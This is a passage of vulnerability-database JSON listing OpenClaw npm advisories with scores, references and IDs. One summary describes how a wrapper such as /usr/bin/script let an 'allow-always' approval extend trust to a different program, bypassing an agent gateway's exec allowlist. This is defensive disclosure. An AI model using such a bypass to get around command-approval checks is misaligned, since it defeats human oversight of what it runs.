com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rm5c-4rmf-vvhw","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rm5c-4rmf-vvhw"},{"reference_url":"https://github.com/advisories/GHSA-rm5c-4rmf-vvhw","reference_id":"GHSA-rm5c-4rmf-vvhw","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rm5c-4rmf-vvhw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["GHSA-rm5c-4rmf-vvhw"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2uqu-k42d-1baq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91485?format=json","vulnerability_id":"VCID-2v8n-mnws-jfc9","summary":"OpenClaw has a gateway exec allowlist allow-always bypass via unregistered /usr/bin/script wrapper\n## Summary\n\nAllow-always persistence did not unwrap `/usr/bin/script` and similar wrappers to the actual executed target before storing trust decisions.\n\n## Impact\n\nA user approval for one wrapped command could persist trust for a wrapper binary that later executed a different underlying program.\n\n## Affected Component\n\n`src/infra/dispatch-wrapper-resolution.ts, src/infra/exec-wrapper-resolution.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `83da3cfe31` (`infra: unwrap script wrapper approval targets`).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41390","reference_id":"","reference_type":"","scores":[{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07933","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07919","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07946","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41390"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/83da3cfe31f016841e1deedda1a604696f4c488d","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/83da3cfe31f016841e1deedda1a604696f4c488d"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6pfc-6m7w-m8fx","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T19:25:11Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6pfc-6m7w-m8fx"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41390","reference_id":"CVE-2026-41390","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41390"},{"reference_url":"https://github.com/advisories/GHSA-6pfc-6m7w-m8fx","reference_id":"GHSA-6pfc-6m7w-m8fx","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6pfc-6m7w-m8fx"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-exec-allowlist-bypass-via-unregistered-usr-bin-script-wrapper","reference_id":"openclaw-exec-allowlist-bypass-via-unregistered-usr-bin-script-wrapper","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T19:25:11Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-exec-allowlist-bypass-via-unregistered-usr-bin-script-wrapper"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41390","GHSA-6pfc-6m7w-m8fx"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2v8n-mnws-jfc9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89183?format=json","vulnerability_id":"VCID-2wr9-h42m-a7ev","summary":"OpenClaw: Tlon media downloads can bypass core safety limits and exhaust disk\n## Summary\nTlon media downloads can bypass core safety limits and exhaust disk\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: Shipped v2026.3.28 Tlon media downloads bypassed core size/count/cleanup limits, but this is availability-only resource exhaustion in a bundled plugin path, so low.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `2194587d70d2aef863508b945319c5a7c88b12ce` — 2026-03-31T19:40:15+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41408","reference_id":"","reference_type":"","scores":[{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.16254","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.16298","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.16308","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41408"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2194587d70d2aef863508b945319c5a7c88b12ce","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:35:12Z/"}],"url":"https://github.com/openclaw/openclaw/commit/2194587d70d2aef863508b945319c5a7c88b12ce"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4g5x-2jfc-xm98","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:35:12Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4g5x-2jfc-xm98"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41408","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41408"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-disk-exhaustion-via-media-download-bypass","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:35:12Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-disk-exhaustion-via-media-download-bypass"},{"reference_url":"https://github.com/advisories/GHSA-4g5x-2jfc-xm98","reference_id":"GHSA-4g5x-2jfc-xm98","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4g5x-2jfc-xm98"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv